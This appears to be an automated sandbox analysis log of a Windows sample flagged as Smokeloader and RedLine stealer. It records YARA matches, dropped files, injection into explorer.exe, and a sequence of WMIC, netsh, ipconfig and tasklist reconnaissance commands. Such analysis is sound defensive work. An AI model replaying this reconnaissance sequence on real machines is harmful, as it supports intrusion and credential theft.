Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004097A1	34_2_004097A1

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00C38801 appears 40 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00C37F70 appears 32 times

Uses 32bit PE files

Source: OCYe9qcxiM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: OCYe9qcxiM.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4470.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hehcrfb.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fihcrfb.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@63/15@5/4

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

Code function: 0_2_0079273A CreateToolhelp32Snapshot,Module32First,

0_2_0079273A

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B67138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,

9_2_00007FF780B67138

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\hehcrfb

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\4470.tmp

Jump to behavior

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior

Source: OCYe9qcxiM.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="556"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="556"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="624"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="624"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="744"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="744"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="868"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="868"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="920"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="920"::GetOwner

Source: C:\Windows\explorer.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543198734.000001B605D13000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543460011.000001B605D1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM Win32_Productp#=:;
Source: ECAA.tmp.11.dr, EF9B.tmp.11.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: OCYe9qcxiM.exe

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\OCYe9qcxiM.exe "C:\Users\user\Desktop\OCYe9qcxiM.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\hehcrfb C:\Users\user\AppData\Roaming\hehcrfb
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4470.exe C:\Users\user\AppData\Local\Temp\4470.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fihcrfb C:\Users\user\AppData\Roaming\fihcrfb
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\354F.exe C:\Users\user\AppData\Local\Temp\354F.exe
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: unknown	Process created: C:\Users\user\AppData\Roaming\hehcrfb C:\Users\user\AppData\Roaming\hehcrfb
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fihcrfb C:\Users\user\AppData\Roaming\fihcrfb
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4470.exe C:\Users\user\AppData\Local\Temp\4470.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\354F.exe C:\Users\user\AppData\Local\Temp\354F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
